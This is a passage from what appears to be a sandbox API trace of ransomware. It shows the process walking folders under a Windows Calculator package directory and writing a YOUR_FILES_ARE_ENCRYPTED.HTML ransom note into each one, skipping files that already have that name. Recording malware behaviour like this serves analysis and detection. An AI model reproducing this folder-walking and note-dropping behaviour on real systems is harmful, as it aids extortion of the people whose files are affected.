lpOverlapped=0x0) returned 1 [0120.002] CloseHandle (hObject=0x324) returned 1 [0120.002] GetProcessHeap () returned 0x600000 [0120.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.002] GetProcessHeap () returned 0x600000 [0120.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.002] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.002] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.002] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.002] GetProcessHeap () returned 0x600000 [0120.002] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.003] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.004] CloseHandle (hObject=0x31c) returned 1 [0120.004] GetProcessHeap () returned 0x600000 [0120.004] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.004] GetProcessHeap () returned 0x600000 [0120.004] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.005] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x564b8c51, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x564b8c51, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.005] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.005] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData") returned 98 [0120.005] GetProcessHeap () returned 0x600000 [0120.005] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.006] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData" [0120.006] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\*" [0120.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x564b8c51, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x564b8c51, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.007] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x564b8c51, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x564b8c51, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.007] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x564b8c51, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x564b8c51, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x564b8c51, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.007] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.007] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.007] GetProcessHeap () returned 0x600000 [0120.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.009] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.010] CloseHandle (hObject=0x31c) returned 1 [0120.010] GetProcessHeap () returned 0x600000 [0120.010] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.010] GetProcessHeap () returned 0x600000 [0120.010] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.010] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.010] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.010] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache") returned 101 [0120.010] GetProcessHeap () returned 0x600000 [0120.011] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.011] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache" [0120.012] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\*" [0120.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.012] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.012] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.012] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.012] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.012] GetProcessHeap () returned 0x600000 [0120.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.013] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.014] CloseHandle (hObject=0x31c) returned 1 [0120.014] GetProcessHeap () returned 0x600000 [0120.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.014] GetProcessHeap () returned 0x600000 [0120.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.015] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.015] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.015] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState") returned 101 [0120.015] GetProcessHeap () returned 0x600000 [0120.015] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.016] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState" [0120.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\*" [0120.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.016] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.016] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.016] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.016] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.016] GetProcessHeap () returned 0x600000 [0120.016] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.018] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.019] CloseHandle (hObject=0x31c) returned 1 [0120.019] GetProcessHeap () returned 0x600000 [0120.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.019] GetProcessHeap () returned 0x600000 [0120.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.019] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.019] StrStrIW (lpFirst="Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.019] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe") returned 152 [0120.019] GetProcessHeap () returned 0x600000 [0120.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.020] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe" [0120.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\*" [0120.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.021] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.021] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.021] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.021] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 168 [0120.021] GetProcessHeap () returned 0x600000 [0120.021] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.022] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.022] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56b938ba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56b938ba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318da58, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.023] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56afae31, 